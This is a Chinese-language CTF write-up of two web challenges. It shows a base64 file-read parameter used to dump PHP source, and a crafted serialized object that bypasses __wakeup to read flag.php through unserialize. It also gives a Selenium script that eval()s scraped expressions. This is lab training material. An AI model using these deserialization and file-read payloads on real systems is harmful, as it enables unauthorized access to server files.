两道CTF Web的题目

1.easyphp

1.1.题目描述

题目首先是一张不存在的图片

两道CTF Web的题目查看源码发现只有一句话

<img src="show.php?img=aGludC5qcGc=" width="100%"/>

点开源码中图片的链接,跳转到下面的页面

两道CTF Web的题目img 后面的内容很像是 base64 编码,经过解码验证,确实是 base64 编码,还原后是 hint.jpg 。

尝试把 img 后面的参数用 flag.jpg、flag.php、flag 的base64编码代替后访问,并没有获取到有价值内容

直接访问 index.php 或者 show.php 也看不到任何东西,所以看看能不能利用 img 这个参数读取两个php源码

index.php 的 base64编码为 aW5kZXgucGhw

show.php 的 base64 编码为 c2hvdy5waHA=

经过尝试后,这时通过源码已经可以读取到内容,内容分别如下

index.php

<?php 
  require_once(‘hint.php‘);
  $x = new hint();
  isset($_GET[‘class‘]) && $g = $_GET[‘class‘];
  if (!empty($g)) {
    $x = unserialize($g);
    echo $x;
  }
?>
<img src="show.php?img=aGludC5qcGc=" width="100%"/>

show.php

<?php
  $f = $_GET[‘img‘];
  if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,‘..‘)===FALSE && stripos($f,‘/‘)===FALSE && stripos($f,‘\\‘)===FALSE
    && stripos($f,‘flag‘)===FALSE) {
      readfile($f);
    } else {
      echo "File not found!";
    }
  }
?>

从 index.php 的源码里看到还有个 hint.php,用同样的方法读取,内容如下

hint.php 的 base64 编码为 aGludC5waHA=

<?php
  error_reporting(0);
    //flag is in flag.php
    class hint{ 
    public $file=‘‘;
    function __destruct(){ 
      if(!empty($this->file)) {
       if(strchr($this-> file,"\\")===false &&  strchr($this->file, ‘/‘)===false)
          show_source(dirname (__FILE__).‘/‘.$this ->file);
       else      die(‘Wrong filename.‘);
      }}  
    function __wakeup(){ $this-> file=‘index.php‘; } 
    public function __toString(){return ‘‘ ;}} 
?>

1.2.代码审计

hint.php 里面告诉我们 flag 在 flag.php中,所以我们要尝试去读取到这个 php 文件

show.php 里面用 stripos 限制了我们读取的内容,我们不能通过 show.php 的方式来读取到 flag.php

hint 里面定义了一个 hint 类,这个类有个 show_source(dirname (__FILE__).‘/‘.$this ->file); 方法,可以读取我们的 php 文件

而在 index.php 里面用到了 unserialize() 函数,用来反序列化一个 hint 对象,我们可以尝试使用反序列化的方式来读取 flag.php

1.3.Payload构造

将 hint.php 复制到本地,然后添加下面几行代码,通过网页取得序列化后的字符串

$x=new hint();
$x->file="flag.php";
echo serialize($x);

两道CTF Web的题目

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

序列化字符串的含义可以参考:https://www.cnblogs.com/dogecheng/p/11652022.html

根据 index.php 的源码,我们把这个字符串赋值给 class 就好了,但是并没有取得 flag

两道CTF Web的题目在网上查询了一些资料后得知,通过 unserialize 反序列化之后,还会调用 __wakeup() 方法,它会把 file 设为 index.php,所以读取的并不是 flag.php

https://blog.csdn.net/bylfsj/article/details/101385852

我们需要绕过 __wakeup() 函数,但是绕过方法很简单。当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。

我们原来的序列化字符串为:

O:4:"hint":1:{s:4:"file";s:8:"flag.php";}

我们只需要把 1 改成比它大的数字即可

O:4:"hint":2:{s:4:"file";s:8:"flag.php";}

这时候重新提交请求就能获得 flag 了

两道CTF Web的题目

2.calculate

2.1.题目描述

题目如下

两道CTF Web的题目

要求我们回答10道计算题。经过测试,每道题要在3秒内答对,答错或超时清零回答正确的问题个数。而且答题间隔要在1秒以上

页面源码如下,计算表达式 都在 div 中

<h1>calculate</h1>

<p>Answer the questions for 10 times and you can get flag.</p>
<p> You Have answered 0銆€questions;</p>

<form action="" method="post">
<div style="display:inline;color:#499E86">6</div><div style="display:inline;color:#BC2109">1</div><div style="display:inline;color:#E20AAD">5</div><div style="display:inline;color:#AE2893">+</div><div style="display:inline;color:#A3A7DA">9</div><div style="display:inline;color:#72311C">9</div><div style="display:inline;color:#7D99E9">7</div><div style="display:inline;color:#3DB475">+</div><div style="display:inline;color:#2144AE">6</div><div style="display:inline;color:#8523C0">1</div><div style="display:inline;color:#D42154">5</div><div style="display:inline;color:#DD166F">*</div><div style="display:inline;color:#0ADBF4">9</div><div style="display:inline;color:#116660">9</div><div style="display:inline;color:#4F6723">7</div><div style="display:inline;color:#7F7A0D">=</div>
<input type="text" name="ans">
<input type="submit" value="send!">
</form>

2.2.脚本编写

一开始用 python 的 requests 库来做,没有成功,改用 selenium 来做就成功了 ,代码如下:

from selenium import webdriver
from bs4 import BeautifulSoup
import time

driver=webdriver.Firefox()
driver.get("http://****:13002/")

def submit(driver):
    # 获取源码
    source = driver.page_source
    # BeautifulSoup解析
    soup = BeautifulSoup(source, "lxml")
    all_div = soup.find_all(name="div")

    # 获取表达式
    s = ""
    for i in all_div:
        s = s + i.contents[0]
    # 去掉等号
    s = s[:-1]
    print(s)

    # 计算
    res = eval(s)

    # 填入答案
    element = driver.find_element_by_name("ans")
    element.send_keys(res)

    # 等待 1.1 秒    
    time.sleep(1.1)
    
    # 提交答案 
    driver.find_element_by_xpath("/html/body/form/input[2]").click()
    print("click")

for i in range(10):
    submit(driver)

回答 10 次后在页面上就会出现 flag 

相关推荐